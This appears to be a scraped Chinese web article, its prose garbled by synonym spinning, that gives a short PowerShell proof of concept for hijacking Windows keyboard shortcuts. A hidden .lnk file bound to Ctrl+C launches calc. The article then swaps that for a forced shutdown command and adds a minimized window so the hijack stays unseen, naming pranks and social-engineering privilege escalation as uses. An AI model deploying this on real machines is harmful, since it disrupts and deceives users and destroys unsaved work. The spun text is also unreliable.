|
|
|
联系客服020-83701501

简单易用,用Powershell劫持Windows系统快捷键;含

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
繁杂易用,用Powershell劫持Windows系统快捷键;含POC

舆论特别尤其繁杂,短短7行powershell竖立快捷办法的代码即梗概严重搞定。

Default
1234567 $WshShell = New-Object -comObject WScript.Shell$Shortcut = $WshShell.CreateShortcut("desktop\desktoppayload.lnk")$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe"$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"$Shortcut.hotkey = "ctrl+c"$Shortcut.Arguments = 'calc'$Shortcut.Save()

代码链接:https://gist.githubusercontent.com/jgamblin/4aa897a2cca6912eeea96a12d73d8cd6/raw/c898394b412a2b2f149cabec94aa08f8a519b0b7/calc.ps1

看一下效果:

垄断舆论

掀开powershell,复制以上代码,粘贴在号令揭示符里实验即梗概了。

此后试试Ctrl+C,会创作发明,这个副本是复制的快捷键,竟然会弹出合计器了(Calc)。。。

假定要想按Ctrl+C,让呆滞关机怎么做?

很繁杂嘛,把calc改为关机的代码即梗概了:

Default
1 $Shortcut.Arguments = 'calc'

改为

Default
1 $Shortcut.Arguments = 'shutdown -s -f -t 1'

道理赏析

实在快捷办法副本就支持快捷键触发的,只是捏,个体只许诺Ctrl+Alt开头。不过Powershell梗概竖立轻易快捷键触发的快捷办法

代码赏析

这代码比拟好熟识,个人上看就是用Powershell竖立一个快捷办法。

代码的第二行指定了快捷办法的存放门路,这里填的是桌面。

第四行给快捷办法指定了图标,这里用的是shell32里的21号图标。

各个图标的编号梗概参考这里:

参考:http://help4windows.com/windows_7_shell32_dll.shtml

足智多谋的你肯定梗概触类旁通,比如梗概Ctrl+V,Ctrl+Alt+Delete 等通通改造一番。

美中不敷的是,上面的7行代码在按下快捷办法的时分,会先闪出一个黑框。那,不要让他弹出黑框怎么做到捏?

就加一行,让其最小化实验。

Default
12345678910 $WshShell = New-Object -comObject WScript.Shell$Shortcut = $WshShell.CreateShortcut("desktop\desktoppayload.lnk")$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe"$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"$Shortcut.hotkey = "ctrl+c" $Shortcut.WindowStyle = '7'  $Shortcut.Arguments = 'calc'$Shortcut.Save()

 

劫持快捷键有良多操纵的场景,恶搞也行,社工提权也梗概做到。

哦,对,假定不想持续劫持快捷键怎么办?

间接删掉快捷办法即梗概了。

 

作者:hackerhub?

数安新闻+更多

证书相关+更多